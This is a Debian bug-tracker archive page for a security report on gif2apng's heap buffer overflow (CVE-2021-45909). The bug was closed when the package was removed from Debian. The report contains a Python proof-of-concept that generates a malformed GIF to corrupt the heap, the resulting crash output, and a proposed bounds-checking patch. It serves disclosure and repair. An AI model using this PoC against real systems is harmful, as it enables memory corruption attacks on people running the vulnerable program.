[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Bug#1002668: marked as done (gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW function)

Your message dated Mon, 07 Feb 2022 21:43:10 +0000
with message-id <[🔎] E1nHBmw-0002k2-QY@fasolo.debian.org>
and subject line Bug#1004933: Removed package(s) from unstable
has caused the Debian Bug report #1002668,
regarding gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW function
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)


-- 
1002668: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002668
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems
--- Begin Message --- 
Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security

Dear Maintainer,

There is a heap based buffer overflow in the gif2apng package. The vulnerability is located in the DecodeLZW function in the gif2apng.cpp file. The problem here is, that this function writes to a buffer, that was allocated using malloc without checking the size of this buffer. Therefore it is possible to provide a gif to the program, that contains more data than fits into this buffer leading to a memory corruption on the heap. I wrote the following poc script in python:

#!/bin/python3

# Writing to poc.gif
f = open("poc.gif", "wb")
# Data needed to enter the code path:
beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" *
9
f.write(beginning)

# Value needed in the vulnerable function
mincode = b"\x07"
f.write(mincode)
for i in range(0,10000):
      # Size value and byte we write to the heap
      target_char = b"\x01" + b"A"
      f.write(target_char)
      # Resetting the values using "clearcode" to keep the code path as simple
as possible
      clear_code = b"\x01" + b"\x80"
      f.write(clear_code)

f.close()

This script creates a file called poc.gif, which writes 10000 "A"'s into a buffer of size 512 leading to memory corruption on the heap. I tested this on Debian 10 using the current version of the package from the testing repository and got the following output:
$ gif2apng -i0 poc.gif /dev/null

gif2apng 1.9 using ZLIB

Reading 'poc.gif'...
1 frames.
malloc(): corrupted top size
Abgebrochen

This vulnerability seems to allow a write of an arbitrary number of arbitrary bytes. Therefore I think it likely, that this could be exploited.

To fix this issue locally I added a buffer_size variable to the main function, which holds the size of the allocated buffer (the imagesize value used initially for the allocation was overwritten at some point). I then passed this value to the DecodeLZW function and added two if-statements around the writes to the the buffer to check whether the buffer can hold more bytes. My code looks as follows:

void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added
parameter img_size
{
      unsigned int bytes_written = 0;
[...]
            if (lastcode == -1)
            {
               if (bytes_written < img_size) { // Added if-statement
                  *pout++ = suffix[code];
                  bytes_written++;
               }
               else {
                  printf("Invalid image size\n");
                  exit(0);
               }
               firstchar = lastcode = code;
               continue;
            }
[...]
            do
            {
               if (bytes_written < img_size) { // Added if-statement
                  *pout++ = *--pstr;
                  bytes_written++;
               }
               else {
                  printf("Invalid image size\n");
                  exit(0);
               }
            }
            while (pstr >  str);
[...]
int main(int argc, char** argv)
{
   unsigned int       buffer_size = 0; // New variable to hold the size of the
buffer
[...]
      grayscale = 1;

      buffer_size = imagesize*2; // New variable, as imagesize is overwritten
at some point
      buffer = (unsigned char *)malloc(buffer_size);
      if (buffer == NULL)
      {
         printf("Error: not enough memory\n");
         return 1;
      }
[...]
            DecodeLZW(buffer, buffer_size, f1); // Added buffer_size
[...]
               DecodeLZW(buffer, buffer_size, f1); // Added Buffer size
[...]

This compiled successfully and fixed the buffer overflow for me. I am however not sure if this is the cleanest way to fix the issue and it could use some more testing.

Best regards
Kolja



-- System Information:
Debian Release: 10.11
  APT prefers oldstable-updates
  APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)

Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages gif2apng depends on:
ii  libc6       2.28-10
ii  libzopfli1  1.0.2-1
ii  zlib1g      1:1.2.11.dfsg-1

gif2apng recommends no packages.

Versions of packages gif2apng suggests:
pn  apng2gif  <none>

-- no debconf information

--- End Message ---
--- Begin Message --- 
Version: 1.9+srconly-3+rm

Dear submitter,

as the package gif2apng has just been removed from the Debian archive
unstable we hereby close the associated bug reports.  We are sorry
that we couldn't deal with your issue properly.

For details on the removal, please see https://bugs.debian.org/1004933

The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.

Please note that the changes have been done on the master archive and
will not propagate to any mirrors until the next dinstall run at the
earliest.

This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmaster@ftp-master.debian.org.

Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)

--- End Message ---
Reply to: